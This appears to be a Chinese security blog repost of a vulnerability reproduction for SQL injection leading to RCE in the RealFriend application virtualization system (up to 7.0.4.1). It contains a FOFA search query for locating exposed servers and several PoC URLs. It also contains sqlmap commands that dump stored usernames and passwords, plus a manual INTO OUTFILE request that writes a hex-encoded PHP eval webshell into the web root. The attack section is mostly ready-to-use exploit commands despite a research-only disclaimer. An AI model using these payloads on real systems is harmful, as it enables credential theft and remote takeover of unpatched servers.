瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)

admin
admin
admin
138635
文章
114
评论
2024年2月18日08:47:31评论229 views字数 1058阅读3分31秒阅读模式

0x01 产品简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。

0x02 漏洞概述

瑞友天翼应用虚拟化系统存在多处SQL注入漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统写入Webshell执行任意代码。

0x03 影响范围

瑞友天翼应用虚拟化系统 <= 7.0.4.1

0x04 复现环境

FOFA:title="瑞友天翼-应用虚拟化系统" || title="瑞友应用虚拟化系统"

瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)

0x05 漏洞复现

poc1:

http://url/AgentBoard.XGI?user='||'1&cmd=UserLogin

poc2:

/ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182

poc3: GetBSAppUrl

EXP

exp1:

sqlmap -u 'http://url/AgentBoard.XGI?user='||'1' -D CASSystemDS -T CUser -C name,pwd --dump
sqlmap -u "" --file-write "/root/shell/shell-php/biaozun.php" --file-dest "C:RealFriendRap ServerWebRoot3.php"
#或者手动
http://172.16.1.200:8081/AgentBoard.XGI?user=%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FRealFriend%2FRap%20Server%2FWebRoot%2F3.php%27%20LINES%20TERMINATED%20BY%200x3c3f70687020406576616c28245f504f53545b22636d64225d293f3e--%20-&cmd=UserLogin
#需要修改绝对路径,内容是16进制,<?php @eval($_POST["cmd"])?>

board-copy aria-label="Copy" value="sqlmap -u 'http://url/AgentBoard.XGI?user='||'1' -D CASSystemDS -T CUser -C name,pwd --dump sqlmap -u " --file-write root shell shell-php biaozun.php --file-dest c:realfriendrap serverwebroot3.php #或者手动 http: 172.16.1.200:8081 agentboard.xgi?user="%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FRealFriend%2FRap%20Server%2FWebRoot%2F3.php%27%20LINES%20TERMINATED%20BY%200x3c3f70687020406576616c28245f504f53545b22636d64225d293f3e--%20-&cmd=UserLogin" #需要修改绝对路径,内容是16进制," tabindex="0" role="button" style=" font-size: 14px; font-weight: var(--base-text-weight-medium, 500); line-height: 20px; vertical-align: middle; cursor: pointer; user-select: none; border-width: 0px; border-style: initial; border-color: initial; border-radius: 6px; appearance: none; color: var(--fgColor-accent, var(--color-accent-fg)); box-shadow: none; transition: color 80ms cubic-bezier(0.33, 1, 0.68, 1) 0s, background-color 0s ease 0s, box-shadow 0s ease 0s, border-color 0s ease 0s; width: var(--control-small-size, 28px); height: var(--control-small-size, 28px); display: flex !important; justify-content: center !important; align-items: center !important; margin: var(--base-size-8, 8px) !important; ">

上述用绝对路径不是最通用写shell方法,不细说了。

漏洞细节

复现环境:版本:6.0.7 查看版本:

/About.XGI
/CASMain.XGI?cmd=About

zend52解密xgi:http://dezend.qiling.org/free/

瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)

漏洞点:

瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)

登陆处是有过滤的,这里没有用过滤函数造成注入。

瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)

getshell直接sqlmap或者手动

原文始发于微信公众号(TKing的安全圈):瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月18日08:47:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)https://cn-sec.com/archives/2501178.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息